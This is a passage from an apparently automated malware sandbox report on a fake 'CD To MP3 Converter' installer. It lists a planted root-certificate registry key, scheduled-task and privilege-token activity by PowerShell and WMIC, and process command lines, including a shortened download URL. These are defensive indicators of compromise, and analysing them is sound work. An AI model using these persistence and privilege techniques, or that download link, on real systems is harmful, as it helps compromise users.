a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e | C:\Users\Admin\AppData\Local\Temp\7zS8359791A\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 | C:\Users\Admin\AppData\Local\Temp\7zS8359791A\setup.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://ify.ac/1Ic5
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffae4c846f8,0x7ffae4c84708,0x7ffae4c84718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,16976522292350151210,3310682960172568424,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2180 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2168,16976522292350151210,3310682960172568424,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2248 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2168,16976522292350151210,3310682960172568424,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2956 /prefetch:8
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,16976522292350151210,3310682960172568424,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3416 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,16976522292350151210,3310682960172568424,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3548 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2168,16976522292350151210,3310682960172568424,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5476 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2168,16976522292350151210,3310682960172568424,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5476 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,16976522292350151210,3310682960172568424,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5568 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,16976522292350151210,3310682960172568424,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5584 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,16976522292350151210,3310682960172568424,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4824 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,16976522292350151210,3310682960172568424,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5788 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,16976522292350151210,3310682960172568424,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3708 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,16976522292350151210,3310682960172568424,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5680 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,16976522292350151210,3310682960172568424,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5560 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2168,16976522292350151210,3310682960172568424,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5632 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,16976522292350151210,3310682960172568424,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5680 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2168,16976522292350151210,3310682960172568424,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6384 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,16976522292350151210,3310682960172568424,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4896 /prefetch:2
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Users\Admin\Desktop\setup_IsfbvpBm5t.exe
"C:\Users\Admin\Desktop\setup_IsfbvpBm5t.exe"
C:\Users\Admin\AppData\Local\Temp\is-ASR24.tmp\setup_IsfbvpBm5t.tmp
"C:\Users\Admin\AppData\Local\Temp\is-ASR24.tmp\setup_IsfbvpBm5t.tmp" /SL5="$80114,6467263,56832,C:\Users\Admin\Desktop\setup_IsfbvpBm5t.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /F /TN "cd_2_mp3-converter_7143"
C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
"C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe" 7f96841ee20b006a6e65d5aef78120f8
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 964 -ip 964
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 880
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 964 -ip 964
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 896
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 964 -ip 964
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 968
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 964 -ip 964
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 1080
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 964 -ip 964
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 1100
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 964 -ip 964
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 1104
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 964 -ip 964
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 1128
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 964 -ip 964
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 1164
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 964 -ip 964
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 1136
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 964 -ip 964
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 996
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 964 -ip 964
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 964
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 964 -ip 964
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 1504
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 964 -ip 964
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 1708
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 964 -ip 964
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 1368
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 964 -ip 964
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 1764
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 964 -ip 964
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 1936
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 964 -ip 964
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 2132
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://t.me/bboobies
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 964 -ip 964
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffae4c846f8,0x7ffae4c84708,0x7ffae4c84718
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 1756
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,16976522292350151210,3310682960172568424,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4772 /prefetch:1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 964 -ip 964
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 2160
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 964 -ip 964
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 1876
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 964 -ip 964
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 1880
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,16976522292350151210,3310682960172568424,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6656 /prefetch:1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 964 -ip 964
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 2212
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 964 -ip 964
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 2220
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 964 -ip 964
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 1756
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 964 -ip 964
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 2316
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 964 -ip 964
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 2324
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 964 -ip 964
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 1904
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 964 -ip 964
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 2308
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 964 -ip 964
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 2352
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 964 -ip 964
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 2328
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 964 -ip 964
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 2392
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 964 -ip 964
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 2356
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 964 -ip 964
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 2344
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 964 -ip 964
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 2408
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 964 -ip 964
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 2336
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 964 -ip 964
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 2388
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 964 -ip 964
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 1880
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 964 -ip 964
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 964
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 964 -ip 964
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 1892
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 964 -ip 964
